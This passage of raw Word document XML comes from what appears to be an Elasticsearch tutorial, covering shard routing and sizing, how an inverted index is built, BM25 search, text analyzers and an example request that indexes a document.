    <w:p w14:paraId="3E8A1418" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5231B07D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Document routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C8818" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  shard_number = hash(document._id) % number_of_primary_shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0DF502" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="687D23F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Write path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9BD8F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Document → route to primary shard → index → replicate to replica shard → ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349CFF8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="71BC3FB2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Read path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE4915D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query → coordinator → ALL relevant shards (primary OR replica) → merge results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A986D0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shard sizing guidelines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A58DDE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684028E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>- Each shard: 10–50 GB (sweet spot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D3887" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>- Too small (&lt; 1 GB): excessive overhead, too many shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791E3F06" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>- Too large (&gt; 50 GB): slow recovery, slow relocations, GC pressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1864BAED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>- Shards per node: 20–50 (more = more heap overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63CAC5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. The Inverted Index — How Search Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E66DC01" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Building the Inverted Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B12F6B0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218EC689" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Document 1: { "title": "Quick Brown Fox", "price": 29.99 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D632E56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Document 2: { "title": "Quick Red Car", "price": 15.00 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F59EC3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Document 3: { "title": "Brown Lazy Dog", "price": 45.00 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8930E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="148E4F5D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Analysis pipeline (for "title" field):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32875D01" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "Quick Brown Fox" → tokenize → ["quick", "brown", "fox"] (lowercase, split)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07CE60" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "Quick Red Car"   → tokenize → ["quick", "red", "car"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C84F8A3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "Brown Lazy Dog"  → tokenize → ["brown", "lazy", "dog"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74437528" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5AF2679B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Inverted index for "title":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D8AB0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Term      → Posting List (document IDs + positions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E5290" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "brown"   → [doc1:pos1, doc3:pos0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F222DF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "car"     → [doc2:pos2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1430A692" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "dog"     → [doc3:pos2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972F5B3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "fox"     → [doc1:pos2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A489285" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "lazy"    → [doc3:pos1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D29BE87" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "quick"   → [doc1:pos0, doc2:pos0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157EFC17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "red"     → [doc2:pos1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4399B6ED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.2 Search Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0B8141" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A8EAE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: "quick brown"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F06AA0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0737458F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Step 1: Look up "quick" → [doc1, doc2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7432B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Step 2: Look up "brown" → [doc1, doc3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAD0C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Step 3: Score each document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B7452B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  doc1: matches BOTH terms → highest score (BM25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE5605A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  doc2: matches "quick" only → medium score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AE65D0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  doc3: matches "brown" only → medium score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D84C5FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Step 4: Sort by score, return top results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AC4430" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Analysis (Text Processing Pipeline)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0D828" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51312D87" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Text: "The Quick-Brown FOX jumped over 2 lazy dogs!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC7A51" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="01DD734F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Character filters: (clean raw text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279D572C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → "The Quick-Brown FOX jumped over 2 lazy dogs!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A25F2AD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (could strip HTML, normalize unicode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDBB075" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="130D8200" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Tokenizer: (split into tokens)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0840F978" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → ["The", "Quick", "Brown", "FOX", "jumped", "over", "2", "lazy", "dogs"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAF1E4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3C2A422B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Token filters: (transform tokens)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C394F6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  lowercase:     → ["the", "quick", "brown", "fox", "jumped", "over", "2", "lazy", "dogs"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8E056" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  stop words:    → ["quick", "brown", "fox", "jumped", "lazy", "dogs"] (remove "the", "over")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B337FB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  stemming:      → ["quick", "brown", "fox", "jump", "lazi", "dog"] (reduce to root form)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40777206" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E21DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Final tokens stored in inverted index: ["quick", "brown", "fox", "jump", "lazi", "dog"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53458195" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Built-in analyzers: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84"/>
        <w:gridCol w:w="4282"/>
        <w:gridCol w:w="2458"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="09400AD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8925B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Analyzer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78CF99" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Behavior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C0EC8F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2C6FA12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EC61E5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>standard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748A33" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Lowercase + split on word boundaries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E691AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>General text</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="443C3A5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86CA1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>english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0465B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Standard + stop words + stemming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BE291E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>English text search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="3633E56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97F327" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>keyword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57F230" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>No tokenization (exact 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F2FF2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Enum fields, IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="3D65AB6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F4262F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>whitespace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69D8C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Split on whitespace only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AD2B5E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Code, technical text</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="099D5AF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6CC0B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>custom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2A1ED2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Configurable pipeline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ED3F2C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Domain-specific</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74B7A9B7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Document Operations and Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F6D894" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Indexing (Writing) a Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF6C6C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F5017" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>PUT /products/_doc/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C04891" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AC9DB9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "title": "iPhone 15 Pro Max",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B7AC6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "description": "Latest Apple smartphone with titanium design",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A120373" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "price": 1199.99,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B46FF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "category": "electronics",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317F4D8C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "tags": ["phone", "apple", "5g"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCED471" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "created_at": "2026-05-28T14:30:00Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8E072" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "location": { "lat": 37.7749, "lon": -122.4194 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778756BE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E17B55B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E952121" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A24A3E4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>1. Route to primary shard: hash("1") % 3 = shard 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB01E72" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>2. Lucene processes document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118CD33C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   - Analyze text fields → build inverted index entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629053C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   - Store doc values (columnar) for "price", "created_at" (sorting/aggregations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EACEDC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   - Store BKD tree entries for "location" (geo queries)</w:t>
      </w:r>
